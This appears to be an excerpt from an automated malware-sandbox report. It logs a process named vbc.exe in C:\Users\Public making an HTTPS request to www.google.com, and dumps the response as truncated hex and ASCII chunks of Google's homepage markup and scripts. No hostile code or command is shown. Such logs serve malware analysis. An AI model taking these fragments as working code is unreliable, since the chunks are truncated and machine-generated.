                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.2249168172.217.168.36443C:\Users\Public\vbc.exe
                                  TimestampkBytes transferredDirectionData
                                  2021-09-14 19:48:33 UTC48OUTGET / HTTP/1.1
                                  Host: www.google.com
                                  Connection: Keep-Alive
                                  2021-09-14 19:48:34 UTC48INHTTP/1.1 200 OK
                                  Date: Tue, 14 Sep 2021 19:48:34 GMT
                                  Expires: -1
                                  Cache-Control: private, max-age=0
                                  Content-Type: text/html; charset=ISO-8859-1
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Server: gws
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  Set-Cookie: CONSENT=PENDING+304; expires=Fri, 01-Jan-2038 00:00:00 GMT; path=/; domain=.google.com; Secure
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                  Accept-Ranges: none
                                  Vary: Accept-Encoding
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  2021-09-14 19:48:34 UTC49INData Raw: 35 30 63 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65
                                  Data Ascii: 50c3<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image
                                  2021-09-14 19:48:34 UTC49INData Raw: 2c 34 31 32 30 2c 32 30 32 33 2c 31 37 37 37 2c 35 32 30 2c 31 34 36 37 30 2c 33 32 32 37 2c 32 38 34 35 2c 37 2c 34 37 37 34 2c 38 32 35 2c 36 37 35 35 2c 35 30 39 36 2c 37 35 33 39 2c 38 37 38 31 2c 39 30 38 2c 32 2c 39 34 31 2c 32 36 31 34 2c 31 33 31 34 32 2c 33 2c 33 34 36 2c 32 33 30 2c 31 30 31 34 2c 31 2c 35 34 34 35 2c 31 34 38 2c 31 31 33 32 33 2c 32 36 35 32 2c 34 2c 31 32 35 32 2c 32 37 36 2c 32 33 30 34 2c 31 32 33 36 2c 35 32 32 37 2c 35 37 36 2c 37 34 2c 31 39 38 33 2c 32 36 32 37 2c 32 30 31 34 2c 31 38 33 37 35 2c 32 36 35 38 2c 37 33 35 36 2c 33 31 2c 33 38 37 37 2c 39 37 35 31 2c 32 33 30 35 2c 36 33 38 2c 31 34 39 34 2c 35 35 38 36 2c 33 37 37 32 2c 37 34 32 38 2c 35 38 33 30 2c 32 35 32 37 2c 34 30 39 34 2c 33 31 33 38 2c 36 2c 39 30
                                  Data Ascii: ,4120,2023,1777,520,14670,3227,2845,7,4774,825,6755,5096,7539,8781,908,2,941,2614,13142,3,346,230,1014,1,5445,148,11323,2652,4,1252,276,2304,1236,5227,576,74,1983,2627,2014,18375,2658,7356,31,3877,9751,2305,638,1494,5586,3772,7428,5830,2527,4094,3138,6,90
                                  2021-09-14 19:48:34 UTC51INData Raw: 72 20 62 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 21 28 62 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 65 69 64 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7c 7c 68 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 6e 75 6c 6c 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 21 28 62 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6c 65 69 64 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7d 0a 66 75 6e 63 74 69 6f 6e 20 6e 28 61 2c 62 2c 63 2c 64 2c 67 29 7b 76 61 72 20 65 3d 22 22 3b 63 7c 7c 2d 31 21 3d 3d 62 2e 73 65 61 72 63 68 28 22 26 65 69 3d 22 29 7c 7c 28 65 3d 22 26 65 69 3d 22 2b 6c 28
                                  Data Ascii: r b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}function n(a,b,c,d,g){var e="";c||-1!==b.search("&ei=")||(e="&ei="+l(
                                  2021-09-14 19:48:34 UTC52INData Raw: 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 69 66 28 61 3d 62 2e 74 61 72 67 65 74 29 7b 76 61 72 20 63 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 75 62 6d 69 74 66 61 6c 73 65 22 29 3b 61 3d 22 31 22 3d 3d 3d 63 7c 7c 22 71 22 3d 3d 3d 63 26 26 21 61 2e 65 6c 65 6d 65 6e 74 73 2e 71 2e 76 61 6c 75 65 3f 21 30 3a 21 31 7d 65 6c 73 65 20 61 3d 21 31 3b 61 26 26 28 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 62 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 29 7d 2c 21 30 29 3b 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73
                                  Data Ascii: cumentElement.addEventListener("submit",function(b){var a;if(a=b.target){var c=a.getAttribute("data-submitfalse");a="1"===c||"q"===c&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventLis
                                  2021-09-14 19:48:34 UTC53INData Raw: 69 74 79 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 30 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 2d 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c
                                  Data Ascii: ity:0 !important;filter:alpha(opacity=0) !important}.gbm{position:absolute;z-index:999;top:-999px;visibility:hidden;text-align:left;border:1px solid #bebebe;background:#fff;-moz-box-shadow:-1px 1px 1px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,
                                  2021-09-14 19:48:34 UTC55INData Raw: 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 67 62 74 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 7a 74 2c 2e 67 62 67 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a
                                  Data Ascii: -box;display:inline-block;line-height:27px;padding:0;vertical-align:top}.gbt{*display:inline}.gbto{box-shadow:0 2px 4px rgba(0,0,0,.2);-moz-box-shadow:0 2px 4px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbzt,.gbgt{cursor:pointer;display:
                                  2021-09-14 19:48:34 UTC56INData Raw: 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 70 64 6a 73 20 2e 67 62 74 6f 20 2e 67 62 6d 7b 6d 69 6e 2d 77 69 64 74 68 3a 39 39 25 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 64 64 34 62 33 39 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 34 73 2c 23 67 62 69 34 73 31 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 23 67 62 67 36 2e 67 62 67 74 2d 68 76 72 2c 23 67 62 67 36 2e 67 62 67 74 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 7d 2e 67 62 67 34 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 67 62 67
                                  Data Ascii: tion:none !important}.gbpdjs .gbto .gbm{min-width:99%}.gbz0l .gbtb2{border-top-color:#dd4b39!important}#gbi4s,#gbi4s1{font-weight:bold}#gbg6.gbgt-hvr,#gbg6.gbgt:focus{background-color:transparent;background-image:none}.gbg4a{font-size:0;line-height:0}.gbg
                                  2021-09-14 19:48:34 UTC57INData Raw: 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 33 36 63 20 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 2a 64 69 73 70
                                  Data Ascii: :visited,.gbml1:visited,.gbmlb:visited{color:#36c !important;text-decoration:none !important}.gbmt,.gbmt:visited{display:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*disp
                                  2021-09-14 19:48:34 UTC58INData Raw: 61 66 74 65 72 2c 23 47 42 4d 50 41 4c 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 5c 30 41 5c 30 41 27 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 67 62 6d 70 73 7b 2a 7a 6f 6f 6d 3a 31 7d 23 67 62 64 34 20 2e 67 62 70 63 2c 23 67 62 6d 70 61 73 20 2e 67 62 6d 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 37 70 78 7d 23 67 62 64 34 20 2e 67 62 70 67 73 20 2e 67 62 6d 74 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 23 67 62 64 34 20 2e 67 62 6d 74 63 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 7d 23 67 62 64 34 20 2e 67 62 70 63 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b
                                  Data Ascii: after,#GBMPAL:last-child:after{content:'\0A\0A';white-space:pre;position:absolute}#gbmps{*zoom:1}#gbd4 .gbpc,#gbmpas .gbmt{line-height:17px}#gbd4 .gbpgs .gbmtc{line-height:27px}#gbd4 .gbmtc{border-bottom:1px solid #bebebe}#gbd4 .gbpc{display:inline-block;
                                  2021-09-14 19:48:34 UTC60INData Raw: 2e 67 62 71 66 62 62 7b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 7d 2e 67 62 70 30 20 2e 67 62 70 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 61 2e 67 62 69 62 61 7b 6d 61 72 67 69 6e 3a 38 70 78 20 32 30 70 78 20 31 30 70 78 7d 2e 67 62 6d 70 69 61 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 78 76 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 67 62 6d 70 69 61 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 6d 70 69 61 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 62 6c
                                  Data Ascii: .gbqfbb{margin:0 20px}.gbp0 .gbps{*display:inline}a.gbiba{margin:8px 20px 10px}.gbmpiaw{display:inline-block;padding-right:10px;margin-bottom:6px;margin-top:10px}.gbxv{visibility:hidden}.gbmpiaa{display:block;margin-top:10px}.gbmpia{border:none;display:bl
                                  2021-09-14 19:48:34 UTC61INData Raw: 62 2d 68 76 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 2e 67 62 71 66 62 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 2e 67 62 71 66 62 61 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 2e 67 62 71 66 62 62 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 3a 30 7d 2e 67 62 71 66 62 61 2c 2e 67 62 71 66 62 62 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 63 64 63 64 63 3b 62
                                  Data Ascii: b-hvr{-webkit-box-shadow:0 1px 1px rgba(0,0,0,.1);-moz-box-shadow:0 1px 1px rgba(0,0,0,.1);box-shadow:0 1px 1px rgba(0,0,0,.1)}.gbqfb::-moz-focus-inner,.gbqfba::-moz-focus-inner,.gbqfbb::-moz-focus-inner{border:0}.gbqfba,.gbqfbb{border:1px solid #dcdcdc;b
                                  2021-09-14 19:48:34 UTC62INData Raw: 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 7d 2e 67 62 71 66 62 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 33 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 33 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67
                                  Data Ascii: adient(top,#4d90fe,#357ae8);background-image:linear-gradient(top,#4d90fe,#357ae8)}.gbqfb:active{background-color:inherit;-webkit-box-shadow:inset 0 1px 2px rgba(0, 0, 0, 0.3);-moz-box-shadow:inset 0 1px 2px rgba(0, 0, 0, 0.3);box-shadow:inset 0 1px 2px rg
                                  2021-09-14 19:48:34 UTC63INData Raw: 66 31 66 31 66 31 27 29 7d 2e 67 62 71 66 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 66 72 6f 6d 28 23 66 66 66 29 2c 74 6f 28 23 66 62 66 62 66 62 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 62 66 62 66 62 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 62 66 62 66 62 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67
                                  Data Ascii: f1f1f1')}.gbqfbb{background-color:#fff;background-image:-webkit-gradient(linear,left top,left bottom,from(#fff),to(#fbfbfb));background-image:-webkit-linear-gradient(top,#fff,#fbfbfb);background-image:-moz-linear-gradient(top,#fff,#fbfbfb);background-imag
                                  2021-09-14 19:48:34 UTC65INData Raw: 30 2c 30 2c 30 2c 2e 31 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 0a 23 67 62 6d 70 61 73 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 32 30 70 78 7d 23 67 62 6d 6d 7b 6d 61 78 2d 68 65 69 67 68 74 3a 35 33 30 70 78 7d 2e 67 62 73 62 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 2a 7a 6f 6f 6d 3a 31 7d 2e 67 62 73 62 69 63 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 2e 67 62 73 62 69 73 20 2e
                                  Data Ascii: 0,0,0,.1);-moz-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);box-shadow:inset 0 1px 2px rgba(0,0,0,.1)}#gbmpas{max-height:220px}#gbmm{max-height:530px}.gbsb{-webkit-box-sizing:border-box;display:block;position:relative;*zoom:1}.gbsbic{overflow:auto}.gbsbis .
                                  2021-09-14 19:48:34 UTC66INData Raw: 6f 6c 6f 72 2d 73 74 6f 70 28 31 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 6c 65 66 74 20 74 6f 70 2c 66 72 6f 6d 28 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 29 2c 74 6f 28 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c
                                  Data Ascii: olor-stop(1,rgba(0,0,0,.1)));background:-webkit-gradient(linear,left bottom,left top,from(rgba(0,0,0,.2)),to(rgba(0,0,0,0)));background-image:-webkit-linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0,0));background-image:-moz-linear-gradient(bottom,rgba(0,
                                  2021-09-14 19:48:34 UTC67INData Raw: 6f 75 6e 64 3a 23 66 38 66 39 66 61 3b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 31 70 78 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 61 64 63 65 30 20 23 37 30 37 35 37 61 20 23 37 30 37 35 37 61 20 23 64 61 64 63 65 30 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 6c 73 62 62 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 23 57 71 51 41 4e 62 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 6c 73 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 69 6d 61 67 65 73 2f 6e 61 76 5f 6c 6f 67 6f 32 32 39 2e 70 6e 67 29 20 30 20 2d 32 36 31 70 78 20 72 65 70 65 61 74 2d 78 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 68 65
                                  Data Ascii: ound:#f8f9fa;border:solid 1px;border-color:#dadce0 #70757a #70757a #dadce0;height:30px}.lsbb{display:block}#WqQANb a{display:inline-block;margin:0 12px}.lsb{background:url(/images/nav_logo229.png) 0 -261px repeat-x;border:none;color:#000;cursor:pointer;he
                                  2021-09-14 19:48:34 UTC69INData Raw: 28 61 2c 62 2c 65 2c 6d 2c 64 29 7b 70 21 3d 3d 61 26 26 67 6f 6f 67 6c 65 2e 6d 6c 28 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 64 3a 45 72 72 6f 72 28 61 29 2c 21 31 2c 76 6f 69 64 20 30 2c 21 31 2c 67 6f 6f 67 6c 65 2e 64 6c 3f 30 3a 32 29 3b 70 3d 6e 75 6c 6c 3b 6c 26 26 6e 3e 3d 6b 26 26 28 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 3d 6e 75 6c 6c 29 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 65 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 61 61 3d
                                  Data Ascii: (a,b,e,m,d){p!==a&&google.ml(d instanceof Error?d:Error(a),!1,void 0,!1,google.dl?0:2);p=null;l&&n>=k&&(window.onerror=null)};})();(function(){try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var e=this||self;var aa=
                                  2021-09-14 19:48:34 UTC69INData Raw: 31 30 62 0d 0a 29 3b 72 65 74 75 72 6e 20 69 73 4e 61 4e 28 61 29 3f 62 3a 61 7d 66 75 6e 63 74 69 6f 6e 20 5f 74 76 76 28 61 29 7b 72 65 74 75 72 6e 21 21 61 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 2c 62 2c 63 29 7b 28 63 7c 7c 67 29 5b 61 5d 3d 62 7d 67 2e 62 76 3d 7b 6e 3a 5f 74 76 6e 28 22 32 22 2c 30 29 2c 72 3a 22 22 2c 66 3a 22 2e 36 36 2e 22 2c 65 3a 22 22 2c 6d 3a 5f 74 76 6e 28 22 31 22 2c 31 29 7d 3b 0a 66 75 6e 63 74 69 6f 6e 20 63 61 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 22 6f 6e 22 2b 62 3b 69 66 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 62 2c 63 2c 21 31 29 3b 65 6c 73 65 20 69 66 28 61 2e 61 74 74 61 63 68 45 76 65 6e 74 29 61 2e 61 74 74 61 63 68 45 76 65 6e 74
                                  Data Ascii: 10b);return isNaN(a)?b:a}function _tvv(a){return!!a}function p(a,b,c){(c||g)[a]=b}g.bv={n:_tvn("2",0),r:"",f:".66.",e:"",m:_tvn("1",1)};function ca(a,b,c){var d="on"+b;if(a.addEventListener)a.addEventListener(b,c,!1);else if(a.attachEvent)a.attachEvent
